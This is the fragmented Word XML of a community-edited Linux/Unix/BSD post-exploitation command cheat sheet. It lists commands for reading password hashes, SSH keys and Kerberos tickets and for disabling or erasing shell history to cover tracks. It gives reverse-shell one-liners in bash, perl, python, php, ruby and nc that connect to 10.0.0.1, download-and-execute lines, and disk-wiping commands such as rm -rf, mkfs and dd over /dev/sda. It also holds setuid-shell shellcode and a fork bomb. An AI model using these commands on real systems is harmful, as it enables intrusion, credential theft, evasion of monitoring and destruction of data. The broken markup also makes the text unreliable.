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0"/>
        <w:jc w:val="left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Linux/Unix/BSD Post-Exploitation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Command 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for any reason you cannot access/edit these files in the future, please contact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99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0099"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mubix@hak5.org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can download these files in any format using Google Doc’s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File-&gt;Download As method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you are viewing this on anything other than Google Docs, you can get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access to the latest links to the Linux/Unix/BSD, OS X, Obscure, Metasploit,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99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docs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http://bit.ly/nuc0N0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9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DISCLAIMER: Anyone can edit these docs, and all that entails and implies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x1x5qjsjgf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lhr89mzy4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xojhdotqlv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y4q6drqtn2v" w:id="3"/>
      <w:bookmarkEnd w:id="3"/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99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y4q6drqtn2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msosz9bb7mr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9d1ls3sym4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Blind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fie1ige7mc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rk5s2w47l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Networking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9b8s2isspq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accounts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58rwlvv8xrw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Credentials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elcvocepqc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op5dynnaw1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Determine Distro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3q03osix6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Installed Packages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apd4nugyr4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Package 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s5cidyjukhu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Finding Important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54mlnuvovz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Covering Your Tracks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zdepznkca6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Avoiding history filesmys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gujnz588ipu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Obtain users’ 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15hrwe7gcz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Escalating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wrbsvpym06p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Looking for possible opened paths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dkwcpqk6to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Maintaining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5twgc79wzo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Reverse Shell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hnb7rgxpzqn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 if Windows is present and accessible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199tyc28x3n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Stuff to be sorted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trf4yyf4tx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sudo -p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649akutdkh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allows the user to define what the password prompt will be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jq00y779et7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Deleting and Destroying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j5mr9w034h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Execute a remote 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hisythb6094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Fork Bomb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9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99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sosz9bb7mrp" w:id="4"/>
      <w:bookmarkEnd w:id="4"/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q9d1ls3sym4f" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind Files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(things to pull when all you can do is blindly read) LFI/dir traversal (Don’t forget %00!)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5085"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4980"/>
            <w:gridCol w:w="5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Contents and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/etc/resolv.conf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current name servers (DNS) for the system. This is a globally readable file that is less likely to trigger IDS alerts than /etc/passwd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/etc/motd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of the Day.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 - current version of distro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local users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users’ passwords’ hashes (requires root)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/home/xxx/.bash_history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give you some directory context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afie1ige7mcs" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System</w:t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5595"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="44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and/or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uname -a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the kernel version, arch, sometimes distro, ...</w:t>
              <w:tab/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running processes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-n 1 -d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process, 1 is a number of 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current username, groups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arch, uname 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 processor architecture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connected, uptime and load avg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uptime, runlevel, tty, proceses etc.</w:t>
              <w:tab/>
              <w:tab/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gcc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GCC.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--version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MySQL.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perl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Perl.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ruby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Ruby.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--version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Python.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-k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mounted fs, size, % use, dev and mount point[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mounted fs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users logged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lastcomm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lastlog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lastlogin (BSD)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getenforce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status of SELinux (Enforcing, Permissive or Disabled)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dmesg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Informations from the last system boot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all PCI buses and devices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all USB buses and devices/h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CPU information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/proc/cpuinfo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/proc/meminfo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 -h --max-depth=1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(note: can cause heavy disk i/o)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nmap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a command (ie nmap or nc)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bin/nmap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bin/nc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jps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Java.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tu43w01pags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rbz0lz44st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erk5s2w47lm" w:id="9"/>
      <w:bookmarkEnd w:id="9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hostname -f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 addr show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 ro show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ifconfig -a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route -n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/etc/network/interfaces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iptables -L -n -v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iptables -t nat -L -n -v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ip6tables -L -n -v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iptables-save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-anop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-nltupw (root with raw sockets)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arp -a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lsof -nPi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The information returned by these commands can also be acquired through “cat /proc/net/*”. This is less likely to trigger monitoring alerts. The drawback is that it generates a lot of information which then has to be analyzed.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9b8s2isspqw" w:id="10"/>
      <w:bookmarkEnd w:id="10"/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local accounts: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat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password hashes in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on Linux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password hashes in /etc/security/passwd on AIX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groups in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(and/or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1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on Linux)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all accounts: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getent 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should dump local, LDAP, NIS, whatever the system is using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same with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getent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Samba’s own database: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pdbedit -L -w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pdbedit -L -v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privileged accounts: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat </w:t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i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(above: cat ???)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mail aliases: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/aliases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 /etc -name aliases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getent aliases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NIS accounts: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ypcat passwd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- displays NIS password file</w:t>
        <w:br w:type="textWrapping"/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58rwlvv8xrws" w:id="11"/>
      <w:bookmarkEnd w:id="11"/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SSH keys, often passwordless: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/*/.ssh/id*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SSH agent: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Kerberos tickets: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/krb5cc_*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/tmp/krb5.keytab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PGP keys: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/*/.gnupg/secring.gpgs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jelcvocepqcs" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Configs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-aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2&gt;/dev/nullte</w:t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/etc/issue{,.net}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/etc/master.passwd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/etc/crontab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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/sysctl.conf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for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)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/etc/resolv.conf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/etc/syslog.conf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/etc/chttp.conf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c/lighttpd.conf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/etc/cups/cupsd.confcda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/etc/inetd.conf</w:t>
        <w:tab/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/opt/lampp/etc/httpd.conf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/etc/samba/smb.conf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/etc/openldap/ldap.conf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/etc/ldap/ldap.conf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/etc/exports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/etc/auto.master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/etc/auto_master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/etc/fstab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/etc/sysconfig/ -type f -exec cat {} \;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rop5dynnaw1r" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine Distro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lsb_release -d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# Generic command for all LSB distros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/etc/os-release</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"># Generic for distros using “systemd”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/etc/issue</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"># Generic but often modified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/etc/*release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/etc/SUSE-release </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"># Novell SUSE </w:t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/etc/redhat-release, /etc/redhat_version </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"># Red Hat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/etc/fedora-release </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"># Fedora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/etc/slackware-release, /etc/slackware-version </w:t>
        <w:tab/>
        <w:t xml:space="preserve"># Slackware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/etc/debian_release, /etc/debian_version</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"># Debian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/etc/mandrake-release </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"># Mandrake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/etc/sun-release </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"># Sun JDS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/etc/release</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"># Solaris/Sparc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/etc/gentoo-release </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"># Gentoo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/etc/arch-release</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"># Arch Linux (file will be empty)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arch</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"># OpenBSD; sample: “OpenBSD.amd64”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uname -a</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"># often hints at it pretty well</w:t>
        <w:br w:type="textWrapping"/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u3q03osix6gd" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Installed Packages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rpm -qa --last | head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yum list | grep installed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Debian:</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">dpkg -l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dpkg -l | grep -i “linux-image”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dpkg --get-selections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{Free,Net}BSD:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">pkg_info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Solaris:</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">pkginfo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Gentoo:</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"># equery must be installed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cd /var/db/pkg/ &amp;&amp; ls -d */*</w:t>
        <w:tab/>
        <w:t xml:space="preserve"># always works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Arch Linux:</w:t>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pacman -Q</w:t>
        <w:br w:type="textWrapping"/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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fapd4nugyr42" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Package Sources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-l /etc/yum.repos.d/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/etc/yum.conf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s5cidyjukhu9" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding Important Files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-dlR */ </w:t>
      </w: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-alR | grep ^d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find /var -type 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-dl `find /var -type d`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-dl `find /var -type d` | grep -v root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find /var ! -user root -type d -ls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/var/log -type f -exec ls -la {} \;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 -perm -4000 (find all suid files)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/mnt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/media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/tmp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/home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cd /home/; treels /home/*/.ssh/*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/home -type f -iname '.*history'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-lart /etc/rc.d/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tar | grep [.]tar$  # Remember to updatedb before running locate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tgz | grep [.]tgz$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sql | grep [.]sql$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settings | grep [.]php$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config.inc | grep [.]php$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/home/*/id*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.properties | grep [.]properties # java config files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.xml | grep [.]xml # java/.net config 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/sbin /usr/sbin /opt /lib `echo $PATH | ‘sed s/:/ /g’` -perm /6000  -ls # find suids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rhosts</w:t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4mlnuvovzfr" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Covering Your Tracks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zdepznkca6s" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Avoiding history filesmys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export HISTFILE=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unset HISTFILE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next one might not be a good idea, because a lot of folks know to check for tampering with this file, and will be suspicious if they find out:</w:t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However if you happen to be on an account that was originally inaccessible, if the .bash_history file is available (ls -a ~), viewcating its contents can provide you with a good deal of information about the system and its most recent updates/changes.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clear all history in ram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history -c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rm -rf ~/.bash_history &amp;&amp; ln -s ~/.bash_history /dev/null (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">invasive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touch ~/.bash_history (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">invasive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&lt;space&gt; history -c (using a space before a command)</w:t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zsh% unset HISTFILE HISTSIZE</w:t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tcsh% set history=0</w:t>
        <w:tab/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bash$ set +o history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ksh$ unset HISTFILE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 -type f -exec {} (forensics nightmare)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Note that you’re probably better off modifying or temporary disabling rather than deleting history files, it leaves a lot less traces and is less suspect.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 some cases HISTFILE and HISTFILESIZE are made read-only; get around this by explicitly clearing history (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">history -c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) or by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kill -9 $$</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">’ing the shell. Sometimes the shell can be configured to run ‘history -w’ after every command; get around this by overriding ‘history’ with a no-op shell function. None of this will help if the shell is configured to log everything to syslog, however.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ujnz588ipum" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Obtain users’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 /home/*/</w:t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/home/*/.ssh/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/home/*/.ssh/authorized_keys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/home/*/.ssh/known_hosts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/home/*/.*hist* # you can learn a lot from this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/home/*/.vnc /home/*/.subversion -type f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grep ^ssh /home/*/.*hist*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grep ^telnet `/home/*/.*hist*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grep ^mysql /home/*/.*hist*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/home/*/.viminfo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sudo -l # if sudoers is not. readable, this sometimes works per user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crontab -l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/home/*/.mysql_history</w:t>
        <w:br w:type="textWrapping"/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15hrwe7gcze" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalating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wrbsvpym06p8" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Looking for possible opened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 /root/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sudo -l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/etc/sudoers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/etc/shadow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/etc/master.passwd # OpenBSD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/var/spool/cron/crontabs/* | cat /var/spool/cron/*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lsof -nPi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/home/*/.ssh/*</w:t>
        <w:br w:type="textWrapping"/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kwcpqk6tonc" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Maintaining control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q5twgc79wzow" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Shell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99"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Starting list sourced from:</w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText xml:space="preserve"> HYPERLINK "http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet"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bash -i &gt;&amp; /dev/tcp/10.0.0.1/8080 0&gt;&amp;1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(No /dev/tcp on older Debians, but use nc, socat, TCL, awk or any interpreter like Python, and so on.).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perl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e 'use Socket; $i="10.0.0.1"; $p=1234; socket(S,PF_INET, SOCK_STREAM, getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,"&gt;&amp;S"); open(STDOUT,"&gt;&amp;S"); open(STDERR,"&gt;&amp;S"); exec("/bin/sh -i");};'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-c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'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-r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'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ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i; exec sprintf("/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="222222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nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many does NOT support -e anymore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rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.0.0.1 1234 &gt;/tmp/f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xterm -display 10.0.0.1:1se</w:t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Listener- Xnest :1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Add permission to connect- xhost +victimIP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ssh -NR 3333:localhost:22 user@yourhost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nc -e /bin/sh 10.0.0.1 1234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hnb7rgxpzqnt" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fun if Windows is present and accessible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there is Windows installed and the logged-in user access level includes those Windows partition, attacker can mount them up and do a much deeper information gathering, credential theft and root-ing. Ntfs-3g is useful for mounting ntfs partitions read-write.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insert details on what to look for</w:t>
        <w:br w:type="textWrapping"/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99tyc28x3ns" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stuff to be sorted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## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN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0"/>
        <w:gridCol w:w="7645"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2170"/>
            <w:gridCol w:w="7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ps aux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running processes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current user and group along with user/group id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info about who is logged, what are they are doing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who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information about users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/dev/core &gt; /dev/audio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/dev/mem &gt; /dev/audio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a sound from the memory content.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Usefulness of this??? (none, aside from pissing off the sysadmin, in the very unlikely case that the server has speakers and the legacy OSS driver)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qtrf4yyf4tx2" w:id="26"/>
            <w:bookmarkEnd w:id="2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sudo -p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0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a649akutdkhs" w:id="27"/>
            <w:bookmarkEnd w:id="2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allows the user to define what the password prompt will be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(useful for fun customization with aliases or shell scripts)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q00y779et7r" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deleting and Destroying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(If it is necessary to leave the machine inaccessible or unusable)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 that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into troubles.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Oh, and you’re probably a jerk if you use any of the stuff below.</w:t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9.8671096345515"/>
        <w:gridCol w:w="4760.1328903654485"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="5319.8671096345515"/>
            <w:gridCol w:w="4760.132890365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-rf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recursively try to delete all files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="4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esp[] __attribute__ ((section(”.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″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“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″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“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″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“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″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“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″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“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″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“\x6e\x2f\x73\x68\x00\x2d\x63\x00″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“cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;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Hex version of rm -rf /</w:t>
              <w:tab/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is this supposed to work?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mkfs.ext3 /dev/sda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Reformat the device mentioned, making recovery of files hard.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dd if=/dev/zero of=/dev/sda bs=1M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Overwrite disk /dev/sda with zeros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j5mr9w034hc" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute a remote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1.528239202658"/>
        <w:gridCol w:w="5018.4717607973425"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="5061.528239202658"/>
            <w:gridCol w:w="5018.4717607973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http://server/file.sh -O- | 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command forces the download of a file and immediately its execution, can be exploited easily using or reverse shit</w:t>
              <w:tab/>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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sythb6094c" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fork Bomb</w:t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5.415282392027"/>
        <w:gridCol w:w="5104.584717607973"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4975.415282392027"/>
            <w:gridCol w:w="5104.5847176079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:(){:|:&amp;};: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[in]famous "fork bomb". This command will cause your system to run a large number of processes, until it "hangs". This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone for enough time a system can eventually recover from a fork bomb.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Stolen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http://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf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5460"/>
        <w:gridCol w:w="3360"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1260"/>
            <w:gridCol w:w="54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writable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directories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word writable folders outside your home directory. It would be a tremendous success if we could write, say to /etc. So we could add configuration files and therefore pretty sure execute code as root, since many daemons read a specific number of primary and secondary configuration files, whereas the secondary ones are often not created yet. If the superusers home (/root) would be writable, we could create shell startup files that doesn't exist yet: .profile,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.bash_profile, .bashrc...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 \( ­wholename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'/home/homedir/*' ­prune \) ­o \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­type d ­perm ­0002 \) ­exec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 ­ld '{}' ';' 2&gt;/dev/null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writable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if /etc/passwd would be writable? Yeah, we just could add another root user and we would have won! Whereas the foregoing scenario is just too good to be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it really makes sense to search for world writable files outside your own territory (= your home directory).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 \( ­wholename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'/home/homedir/*' ­prune ­o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­wholename '/proc/*' ­prune \)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­o \( ­type f ­perm ­0002 \)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­exec ls ­l '{}' ';' 2&gt;/dev/null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Sometimes a security unaware administrator chmods a sensitive log file, because he couldn't view it and therefore leaks potentially sensitive data such as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passwords or other important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/var/log ­type f ­perm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­0004 2&gt;/dev/null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Setuid / setgid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already examined fully why setuid and setgid files are worth to be double checked. Such a file owned by root and susceptible for attacks is a big weakness.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 \( ­type f ­or ­type d \)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­perm ­6000 2&gt;/dev/null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sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Linux/Unix/BSD Post Exploitation Command List - Page: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bit.ly/nuc0N0" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/url?q=http%3A%2F%2Fpentestmonkey.net%2Fcheat-sheet%2Fshells%2Freverse-shell-cheat-sheet&amp;sa=D&amp;sntz=1&amp;usg=AFQjCNFxX7D4XrJV999xsFEVnml66qvHZA" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://incolumitas.com/wp-content/uploads/2012/12/blackhats_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